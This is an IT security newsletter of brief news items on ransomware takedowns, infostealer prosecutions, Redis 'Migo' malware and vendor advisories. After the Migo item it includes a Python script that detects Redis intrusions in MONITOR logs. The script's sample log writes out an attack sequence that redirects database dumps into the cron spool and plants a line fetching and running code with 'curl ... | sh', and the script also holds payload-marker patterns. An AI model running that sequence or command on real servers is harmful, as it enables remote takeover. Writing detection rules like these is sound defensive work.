IT Security Newsletter

IT Security Newsletter - 2/21/2024

Written by Cadre | Wed, Feb 21, 2024

Law enforcement trolls LockBit, reveals massive takedown

In an act of exquisite trolling, the UK's National Crime Agency (NCA) has announced further details about its disruption of the LockBit ransomware group by using the group's own dark web website. Since the demise of Conti in 2022, LockBit has been unchallenged as the most prolific ransomware group in the world. In the last 12 months it has racked up more than two and a half times as many known attacks as its closest rival. READ MORE...

Alleged Raccoon Infostealer operator extradited, verification site set up for victims

A Ukrainian national was extradited to the United States from the Netherlands after being indicted for crimes related to fraud, money laundering, and aggravated identity theft. According to court documents, Mark Sokolovsky conspired to operate the Raccoon Infostealer as a malware-as-a-service or "MaaS." Individuals who deployed Raccoon Infostealer to steal data from victims leased access to the malware for approximately $200 per month, paid for by cryptocurrency. READ MORE...

Redis Servers Targeted With New 'Migo' Malware

Redis servers are being targeted with new malware that deploys a user-mode rootkit and cryptocurrency miners, cloud forensics and incident response firm Cado reports. As part of the observed attacks, threat actors execute a series of commands on the victim Redis servers to disable configuration options and weaken the target before deploying the malicious payload. The primary payload in these attacks is a piece of malware dubbed 'Migo', which is written in the Go programming language. READ MORE...
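The attack pattern described above (weaken the server's configuration over the Redis protocol, then stage the payload) is visible in `redis-cli MONITOR` output or an equivalent command log. The following is an added example, not code from the Cado report or from the Migo malware: a small Python rule set run over constructed MONITOR lines. The options it flags (protected-mode, replica-read-only, dir/dbfilename changes, REPLICAOF to a foreign host, MODULE LOAD, multi-line values that look like cron entries or SSH keys) are my choice of settings commonly abused in Redis intrusions generally, not the page's list of what Migo changes; the client addresses, the URL and the cron-style payload in the sample are constructed.

```python
import re
from dataclasses import dataclass

# One redis-cli MONITOR line looks like:
#   1708500001.100000 [0 10.0.0.5:43210] "CONFIG" "SET" "protected-mode" "no"
MONITOR_RE = re.compile(r'^(?P<ts>\d+\.\d+) \[(?P<db>\d+) (?P<client>\S+)\] (?P<argv>.*)$')
ARG_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')  # one double-quoted, backslash-escaped argument

# CONFIG SET key -> values that switch a protection off. Illustrative choices
# (assumption); the page does not list which options the Migo operators toggle.
WEAKENING_VALUES = {
    "protected-mode": {"no"},
    "replica-read-only": {"no"},
    "slave-read-only": {"no"},
    "stop-writes-on-bgsave-error": {"no"},
}
# Keys that move where RDB/AOF files are written: the classic route to dropping
# attacker-controlled content into cron spools or authorized_keys.
WRITE_PATH_KEYS = {"dir", "dbfilename", "appendfilename"}
# Substrings that make a stored value look like a staged payload rather than data.
PAYLOAD_MARKERS = ("* * * * *", "ssh-rsa", "ssh-ed25519", "/bin/sh", "curl ", "wget ")

@dataclass
class Finding:
    ts: float
    client: str
    category: str   # weaken | dump-path | replication | module | payload
    detail: str

def parse_monitor_line(line):
    """Return (timestamp, client, argv) or None for lines that are not MONITOR records."""
    m = MONITOR_RE.match(line.strip())
    if not m:
        return None
    # MONITOR escapes bytes as \xNN, \n, \" and \\; unicode_escape undoes the ASCII cases.
    argv = [a.encode().decode("unicode_escape") for a in ARG_RE.findall(m.group("argv"))]
    return float(m.group("ts")), m.group("client"), argv

def classify(ts, client, argv):
    """Map one parsed command to a Finding, or None if it is not interesting."""
    if not argv:
        return None
    cmd = argv[0].upper()
    if cmd == "CONFIG" and len(argv) >= 4 and argv[1].upper() == "SET":
        key, value = argv[2].lower(), argv[3]
        if value.lower() in WEAKENING_VALUES.get(key, ()):
            return Finding(ts, client, "weaken", f"{key} set to {value}")
        if key in WRITE_PATH_KEYS:
            return Finding(ts, client, "dump-path", f"{key} set to {value!r}")
    elif cmd in ("SLAVEOF", "REPLICAOF") and len(argv) >= 3:
        if not (argv[1].upper() == "NO" and argv[2].upper() == "ONE"):
            return Finding(ts, client, "replication", f"replicating from {argv[1]}:{argv[2]}")
    elif cmd == "MODULE" and len(argv) >= 3 and argv[1].upper() == "LOAD":
        return Finding(ts, client, "module", f"loading {argv[2]!r}")
    elif cmd in ("SET", "SETEX", "APPEND") and len(argv) >= 3:
        value = argv[-1]
        if "\n" in value and any(marker in value for marker in PAYLOAD_MARKERS):
            return Finding(ts, client, "payload", f"multi-line value written to key {argv[1]!r}")
    return None

def scan(lines):
    """Run every MONITOR line through the rules and return the findings in order."""
    findings = []
    for line in lines:
        parsed = parse_monitor_line(line)
        if parsed is None:
            continue
        f = classify(*parsed)
        if f is not None:
            findings.append(f)
    return findings

def suspicious_clients(findings, min_categories=2):
    """Clients that hit at least `min_categories` distinct rule categories.
    One CONFIG SET can be an admin; weakening followed by a dump-path change or a
    staged payload from the same client is the intrusion sequence."""
    seen = {}
    for f in findings:
        seen.setdefault(f.client, set()).add(f.category)
    return {c for c, cats in seen.items() if len(cats) >= min_categories}

# Constructed sample MONITOR output (not real traffic): one attacker session from
# 10.0.0.5 and one benign local client.
SAMPLE_MONITOR = """\
1708500001.100000 [0 10.0.0.5:43210] "CONFIG" "SET" "protected-mode" "no"
1708500001.200000 [0 10.0.0.5:43210] "CONFIG" "SET" "replica-read-only" "no"
1708500001.300000 [0 10.0.0.5:43210] "CONFIG" "SET" "dir" "/var/spool/cron"
1708500001.400000 [0 10.0.0.5:43210] "CONFIG" "SET" "dbfilename" "root"
1708500001.500000 [0 10.0.0.5:43210] "SET" "x" "\\n* * * * * curl -fsSL http://198.51.100.7/x | sh\\n"
1708500001.600000 [0 10.0.0.5:43210] "SAVE"
1708500002.000000 [0 127.0.0.1:50001] "GET" "session:abc123"
1708500002.100000 [0 127.0.0.1:50001] "REPLICAOF" "NO" "ONE"
"""

if __name__ == "__main__":
    found = scan(SAMPLE_MONITOR.splitlines())
    for f in found:
        print(f"{f.ts:.3f} {f.client} [{f.category}] {f.detail}")
    print("suspicious clients:", sorted(suspicious_clients(found)))
```

Feed it `redis-cli MONITOR` output captured during an investigation, or adapt `parse_monitor_line` to whatever command logging a proxy or eBPF tap in front of Redis produces. The per-client correlation in `suspicious_clients` is the part worth keeping: a lone `CONFIG SET` is routine administration, while the same source weakening the server and then rewriting where dumps land is the sequence the Cado write-up describes.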

Median Ransomware Demands Grow to $600K a Pop

When it comes to ransomware attacks, median initial ransom demands for 2023 spiked 20% year-over-year to reach $600,000, with some sectors hit much worse than that: The legal, government, retail, and energy industries are now routinely seeing median demands of $1 million or more. That's according to Arctic Wolf, whose annual cybercrime report out this week shows that manufacturing-vertical victims showed up in 708 posts on various leak sites, making it the most represented industry. READ MORE...

Knight ransomware source code for sale after leak site shuts down

The alleged source code for the third iteration of the Knight ransomware is being offered for sale to a single buyer on a hacker forum by a representative of the operation. Knight ransomware launched at the end of July 2023 as a re-brand of the Cyclops operation, targeting Windows, macOS, and Linux/ESXi systems. It gained some traction because it provided info-stealers and a 'lite' version of its encryptor for lower-tier affiliates that attacked smaller organizations. READ MORE...

Library Cyber Defenses Are Falling Down

In an age where digital warfare and cyber espionage have become commonplace, institutions such as libraries and museums are locked in an asymmetrical battle against well-resourced adversaries. The massive ransomware attack on the British Library last October should be ringing alarm bells for knowledge repositories around the world. The Rhysida ransomware group is believed to be behind the attack, where attackers stole user data and employee information. READ MORE...

Active Directory outages can cost organizations $100,000 per day

Nearly every organization has core systems and services tied to Active Directory that will go down during an outage, according to Cayosoft. The impact of just one system being down can devastate business operations and cause significant financial and operational losses, from preventing customer purchases and supplier communications to disrupting core functions, such as email access and device logins. READ MORE...

Executive Order on Port Cybersecurity Points to IT/OT Threat Posed by Chinese Cranes

The White House announced on Wednesday that the Biden-Harris administration is issuing an executive order to boost the cybersecurity of US ports, highlighting the risks posed by the use of cranes made by China. Ports, vessels, shipping companies, and other entities in the maritime sector are regularly impacted by cyber incidents, as shown by the maritime cyberattack database launched last year by a Dutch university. READ MORE...

VMware urges admins to remove deprecated, vulnerable auth plug-in

VMware urged admins today to remove a discontinued authentication plugin exposed to authentication relay and session hijack attacks in Windows domain environments via two security vulnerabilities left unpatched. The vulnerable VMware Enhanced Authentication Plug-in (EAP) enables seamless login to vSphere's management interfaces via Integrated Windows Authentication and Windows-based smart card functionality on Windows client systems. READ MORE...

Singapore's monetary authority advises banks to get busy protecting against quantum decryption

The Monetary Authority of Singapore (MAS) advised on Monday that financial institutions need to stay agile enough to adopt post-quantum cryptography (PQC) and quantum key distribution (QKD) technology as part of their cyber security measures, without significantly impacting their systems. "Leading experts forecast that cyber security risks associated with quantum will materialize in the coming decade," the MAS reasoned in its advisory. READ MORE...

  • ...in 1946, actor Alan Rickman ("Die Hard", "Harry Potter") is born in London, England.
  • ...in 1972, US President Richard Nixon visits the People's Republic of China, opening diplomatic relations between the two nations.
  • ...in 1979, comedian and filmmaker Jordan Peele ("Key & Peele", "Get Out") is born in New York City.
  • ...in 1995, adventurer Steve Fossett lands in Saskatchewan, Canada, becoming the first person to complete a solo balloon flight across the Pacific Ocean.